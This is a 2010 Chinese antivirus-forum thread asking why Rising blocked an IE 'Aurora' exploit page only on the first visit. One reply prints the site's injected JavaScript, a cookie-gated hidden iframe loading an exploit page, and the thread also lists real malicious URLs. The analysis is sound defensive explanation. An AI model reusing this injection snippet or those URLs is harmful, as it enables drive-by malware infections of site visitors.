瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » IE极光漏洞,瑞星只拦截一次,第二次打开瑞星就无反了怎么回事?
五湖秋 - 2010-3-2 19:58:00
极光恶意网址:http://www.xinnong.com/niu/hangqing/wow/10150.html  第一打开时瑞星拦截,但是第二次打开瑞星就没反应了?为什么是拦截失败了么?
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TheWorld)
德拉克拉 - 2010-3-2 20:00:00
我还以为新闻呢,点了报毒。。。 LZ什么意思啊,也不写清楚了。
网络版工作 - 2010-3-2 20:13:00
第一次拦截时,你使用的处理方式是什么?
newcenturymoon - 2010-3-2 20:22:00
瑞星报的什么  是防火墙报警么
网络版工作 - 2010-3-2 20:26:00
访问地址:http://www.sat-china.com/wxds/2007/upme.htm?lo2ving
病毒:Suspicious.ShellCode.Exploit
攻击说明: 病毒名:Suspicious.ShellCode.Exploit
  木马网站利用了缓冲区溢出漏洞。缓冲区溢出是由编程错误引起的。如果缓冲区被写满,而程序没有去检查缓冲区边界,也没有停止接收数据,这时缓冲区溢出就会发生,溢出代码利用者利用溢出构造特殊的溢出代码,使得程序返回到溢出者期望的位置执行溢出者定义的代码,来实现木马下载和运行的目的。

病毒名:Suspicious.ShellCode.Exploit
  木马网站利用了缓冲区溢出漏洞。缓冲区溢出是由编程错误引起的。如果缓冲区被写满,而程序没有去检查缓冲区边界,也没有停止接收数据,这时缓冲区溢出就会发生,溢出代码利用者利用溢出构造特殊的溢出代码,使得程序返回到溢出者期望的位置执行溢出者定义的代码,来实现木马下载和运行的目的。
天月来了 - 2010-3-3 7:42:00
无论打开多少次,瑞星防火墙都正确拦截了
Cool_wXd - 2010-3-3 11:09:00


[复制到剪贴板]
CODE:
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{
document.cookie = "Cookie1=risb;expires="+ Then.toGMTString()
document.writeln("<iframe src=http://www.sat-china.com/wxds/2007/upme.htm?lo2ving width=0 height=0></iframe>");
}
}Get();  //调用函数Get()


以上部分是挂马的代码
首先要知道为什么第二次访问的时候瑞星不报了
因为他是通过cookie进行判断的
你第一次访问的时候虽然瑞星拦截了,但是cookie文件会保存到你的机器中,第二次你在访问的时候,他会因为判断cookie文件存在,所以就什么也不执行了,这个时候网马根本没有运行。
你可以做以下实验:
第一次执行的时候瑞星可以有效拦截,然后进行清除cookie的操作,然后再进行第二次访问,这时候你会发现瑞星还是可以有效拦截的。因为你把cookie删除以后,他认为网马在你机器上没有执行过,所以就回去执行网马了。
幸福耗子 - 2010-3-3 11:10:00
第一次打开拦截 第二次打开不拦截 正常 网站被挂恶意代码 添加了cookie检测
小棉花ZY - 2010-3-5 11:15:00
瑞星应该正确拦截了的,好像360有极光漏洞的补丁。
networkedition - 2010-3-5 11:23:00
那个极光漏洞微软已经发布补丁了:kaka6:
1
查看完整版本: IE极光漏洞,瑞星只拦截一次,第二次打开瑞星就无反了怎么回事?
© 2000 - 2025 Rising Corp. Ltd.